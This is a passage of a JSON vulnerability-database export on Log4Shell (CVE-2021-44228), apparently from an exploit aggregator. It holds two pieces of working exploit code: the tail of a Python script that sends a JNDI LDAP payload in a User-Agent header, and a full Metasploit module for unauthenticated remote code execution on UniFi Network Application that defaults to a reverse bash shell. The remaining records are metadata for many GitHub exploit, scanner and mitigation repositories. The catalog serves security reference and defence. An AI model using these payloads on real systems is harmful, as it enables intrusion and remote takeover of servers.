required=True, help='target uri') \nparser.add_argument('--listen-host', default='0.0.0.0', \nhelp='exploit server host to listen on \n(default: 127.0.0.1)') \nparser.add_argument('--listen-port', '-lp', default=8888, \nhelp='exploit server port to listen on (default: 8888)') \nparser.add_argument('--exploit-host', '-eh', required=True, \ndefault='127.0.0.1', \nhelp='host where (this) exploit server is reachable') \nparser.add_argument('--leak', '-l', default='${java:version}', \nhelp='value to leak. ' \n'see: \nhttps://twitter.com/Rayhan0x01/status/1469571563674505217 ' \n'(default: ${java:version})') \nargs = parser.parse_args() \n \nprint(f' i| starting server on {args.listen_host}:{args.listen_port}') \nserver = ThreadedTCPServer((args.listen_host, args.listen_port), \nThreadedTCPRequestHandler) \n \nserv_thread = threading.Thread(target=server.serve_forever) \nserv_thread.daemon = True \nserv_thread.start() \ntime.sleep(1) \nprint(f' i| server started') \n \npayload = f'${{jndi:ldap://{args.exploit_host}:{args.listen_port}/{args.leak}}}' \nprint(f' i| sending exploit payload {payload} to {args.target}') \n \ntry: \nr = requests.get(args.target, headers={'User-Agent': payload}) \nprint(f' i| response status code: {r.status_code}') \nprint(f' i| response: {r.text}') \nexcept Exception as e: \nprint(f' e| failed to make request: {e}') \nfinally: \nserver.shutdown() \nserver.server_close() \n \n \nif __name__ == '__main__': \nmain() \n \n \n`\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://packetstormsecurity.com/files/download/165261/log4j22141-disclose.txt"}, {"lastseen": "2022-01-24T15:14:37", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-24T00:00:00", "type": "packetstorm", "title": "UniFi Network Application Unauthenticated Log4Shell Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-01-24T00:00:00", "id": "PACKETSTORM:165673", "href": "https://packetstormsecurity.com/files/165673/UniFi-Network-Application-Unauthenticated-Log4Shell-Remote-Code-Execution.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::JndiInjection \ninclude Msf::Exploit::Remote::HttpClient \nprepend Msf::Exploit::Remote::AutoCheck \n \ndef initialize(_info = {}) \nsuper( \n'Name' => 'UniFi Network Application Unauthenticated JNDI Injection RCE (via Log4Shell)', \n'Description' => %q{ \nThe Ubiquiti UniFi Network Application versions 5.13.29 through 6.5.53 are affected by the Log4Shell \nvulnerability whereby a JNDI string can be sent to the server via the 'remember' field of a POST request to the \n/api/login endpoint that will cause the server to connect to the attacker and deserialize a malicious Java \nobject. This results in OS command execution in the context of the server application. \n \nThis module will start an LDAP server that the target will need to connect to. \n}, \n'Author' => [ \n'Spencer McIntyre', # this exploit module and JNDI/LDAP lib stuff \n'RageLtMan <rageltman[at]sempervictus>', # JNDI/LDAP lib stuff \n'Nicholas Anastasi' # Unifi research \n], \n'References' => [ \n[ 'CVE', '2021-44228' ], \n[ 'URL', 'https://www.sprocketsecurity.com/blog/another-log4j-on-the-fire-unifi' ], \n[ 'URL', 'https://github.com/puzzlepeaches/Log4jUnifi' ], \n[ 'URL', 'https://community.ui.com/releases/UniFi-Network-Application-6-5-54/d717f241-48bb-4979-8b10-99db36ddabe1' ] \n], \n'DisclosureDate' => '2021-12-09', \n'License' => MSF_LICENSE, \n'DefaultOptions' => { \n'RPORT' => 8443, \n'SSL' => true, \n'WfsDelay' => 30 \n}, \n'DefaultTarget' => 1, \n'Targets' => [ \n[ \n'Windows', { \n'Platform' => 'win' \n}, \n], \n[ \n'Unix', { \n'Platform' => 'unix', \n'Arch' => [ARCH_CMD], \n'DefaultOptions' => { \n'PAYLOAD' => 'cmd/unix/reverse_bash' \n} \n}, \n] \n], \n'Notes' => { \n'Stability' => [CRASH_SAFE], \n'SideEffects' => [IOC_IN_LOGS], \n'AKA' => ['Log4Shell', 'LogJam'], \n'Reliability' => [REPEATABLE_SESSION] \n} \n) \nregister_options([ \nOptString.new('TARGETURI', [ true, 'Base path', '/']) \n]) \nend \n \ndef wait_until(&block) \ndatastore['WfsDelay'].times do \nbreak if block.call \n \nsleep(1) \nend \nend \n \ndef check \nvalidate_configuration! \nres = send_request_cgi('uri' => normalize_uri(target_uri, 'status')) \nreturn Exploit::CheckCode::Unknown('No HTTP response was received.') if res.nil? \n \nserver_version = res.get_json_document.dig('meta', 'server_version') \nreturn Exploit::CheckCode::Safe('The target service does not appear to be running.') unless server_version =~ /(\\d+\\.)+/ \n \nvprint_status(\"Detected version: #{server_version}\") \nserver_version = Rex::Version.new(server_version) \nif server_version < Rex::Version.new('5.13.29') \nreturn Exploit::CheckCode::Safe('Versions prior to 5.13.29 are not exploitable.') \nelsif server_version > Rex::Version.new('6.5.53') \nreturn Exploit::CheckCode::Safe('Versions after 6.5.53 are patched and not affected.') \nend \n \nvprint_status('The target appears to be a vulnerable version, attempting to trigger the vulnerability...') \n \nstart_service \nres = trigger \nreturn Exploit::CheckCode::Unknown('No HTTP response was received.') if res.nil? \n \nwait_until { @search_received } \n@search_received ? Exploit::CheckCode::Vulnerable : Exploit::CheckCode::Unknown('No LDAP search query was received.') \nensure \nstop_service \nend \n \ndef build_ldap_search_response_payload \nreturn [] if @search_received \n \n@search_received = true \n \nreturn [] unless @exploiting \n \nprint_good('Delivering the serialized Java object to execute the payload...') \nbuild_ldap_search_response_payload_inline('BeanFactory') \nend \n \ndef trigger \n@search_received = false \n# HTTP request initiator \nsend_request_cgi( \n'uri' => normalize_uri(target_uri, 'api', 'login'), \n'method' => 'POST', \n'ctype' => 'application/json', \n'data' => { \n'username' => rand_text_alphanumeric(8..16), # can not be blank!, \n'password' => rand_text_alphanumeric(8..16), # can not be blank! \n'remember' => jndi_string, \n'strict' => true \n}.to_json \n) \nend \n \ndef exploit \nvalidate_configuration! \n \n@exploiting = true \nstart_service \nres = trigger \nfail_with(Failure::Unreachable, 'Failed to trigger the vulnerability') if res.nil? \n \nmsg = res.get_json_document.dig('meta', 'msg') \nif res.code == 400 && msg == 'api.err.Invalid' # returned by versions before 5.13.29 \nfail_with(Failure::NotVulnerable, 'The target is not vulnerable') \nend \n \nunless res.code == 400 && msg == 'api.err.InvalidPayload' # returned by versions after 5.13.29 (including patched ones) \nfail_with(Failure::UnexpectedReply, 'The server replied to the trigger in an unexpected way') \nend \n \nwait_until { @search_received && (!handler_enabled? || session_created?) } \nhandler \nensure \ncleanup \nend \nend \n`\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://packetstormsecurity.com/files/download/165673/ubiquiti_unifi_log4shell.rb.txt"}], "githubexploit": [{"lastseen": "2023-05-23T17:35:26", "description": "# Log4Shell Honeypot\n\nThis demo application is vulnerable to the...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-17T10:32:39", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-04-03T03:58:01", "id": "0ABA9FB5-93DD-59F1-9580-232DBFBB4AD8", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-01-18T14:46:06", "description": "# RS4LOGJ-CVE-2021-44228\n## Apache Log4j ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-28T13:32:16", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-28T13:50:33", "id": "4A0D603B-6526-5D1E-BADC-55B4775C354B", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-14T17:13:55", "description": "# aws-log4j-mitigations\n\nMitigations ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-12-13T08:01:55", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-13T08:05:42", "id": "126A30D2-0273-510B-B34A-DF7AE6E0C1C0", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-02-22T09:04:38", "description": "## Log4J_Exploitation-Vulnerabiliy__CVE-2021-44228.\n\n![Untitled]...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-13T11:29:57", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-01-08T00:28:45", "id": "9DAC062A-CFE4-5BB0-983A-8BAB512CF589", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-20T20:08:57", "description": "# CVE-2021-44228\n\nAn attacker who can control log messages or lo...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-17T18:03:50", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-20T17:53:14", "id": "30C6DF99-400E-539F-AA8D-39E7407F4796", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-04-01T15:06:25", "description": "# log4j-fuzzer\n## For Single Target \n```bash\nchmod +x log4j\n```\n...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-08T00:28:32", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-04-01T12:41:00", "id": "E9DFB8EA-B99D-5022-ACE6-5A42D0D6A350", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-14T17:15:16", "description": "# CVE-2021-44228-quickfix-script\nUse environment variable to dis...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-12-12T04:17:08", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-12T05:19:16", "id": "D77DEF60-6E7D-5708-B9F2-DB4EA3E38C23", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-03-20T18:11:07", "description": "<!doctype html><html lang=\"pt\" dir=\"ltr\"><head><base href=\"https...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-12T22:52:02", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2023-03-14T11:35:57", "id": "C640B511-D1E9-5F57-964D-3826F1C68DF8", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-11T02:07:56", "description": "# CVE-2021-44228-test\n\nwysylasz `${jndi:ldap:...", "cvss3": {}, "published": "2021-12-10T15:39:09", "type": "githubexploit", "title": "Exploit for CVE-2021-44228", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-10T19:43:39", "id": "780AD920-FF08-55C6-84C8-A8536C6F5527", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}, "privateArea": 1}, {"lastseen": "2021-12-27T08:07:19", "description": "# Log4j_Attacker_IPList\nCVE-2021...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-27T06:29:12", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-27T06:34:21", "id": "149F99C3-6B62-5255-8DA6-A0370E6ED5F7", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-04-26T18:07:03", "description": "# CVE-2021-44228-ScannersListFromRF\n\nIn light with a huge amount...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-20T10:34:48", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2023-02-09T08:14:37", "id": "9D8C431A-57F3-560C-8146-1232C2C029C2", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-06-22T16:51:26", "description": "# CVE-2021-44228-Mass-RCE\nCVE-2021-44228 Mass Exploitation tool ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-04-18T09:16:05", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-06-22T13:16:14", "id": "3AAA878D-C72A-52A0-A5B6-0977BAF6F01D", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-05-19T17:21:20", "description": "# Log4j\nThe Log4j Vulnerability (CVE-2021-44228), also known as ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-05-19T13:49:40", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-05-19T14:30:24", "id": "C14C47DA-F04C-56CC-955A-FF12A410D2F5", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-05-17T15:41:48", "description": "# jndiRep - CVE-2021-44228\nBasically a **bad** grep on even **wo...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-11T12:25:08", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-11-24T11:13:49", "id": "5A5A28A1-2601-54F3-BA06-BCFF1A9DCCA5", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-11-28T02:32:54", "description": "# Log4j-CVE-2021-44228\n<img src=\"2021-12-13_20-41.png\">\n\nMass Ch...", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2021-12-13T13:30:57", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2023-09-28T11:34:04", "id": "1E085D9B-26F5-5960-938C-AEB76BCE61D8", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-18T14:09:25", "description": "# Spring Boot Log4j - CVE-2021-44228\n\nThe Log4Shell vulnerabilit...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", 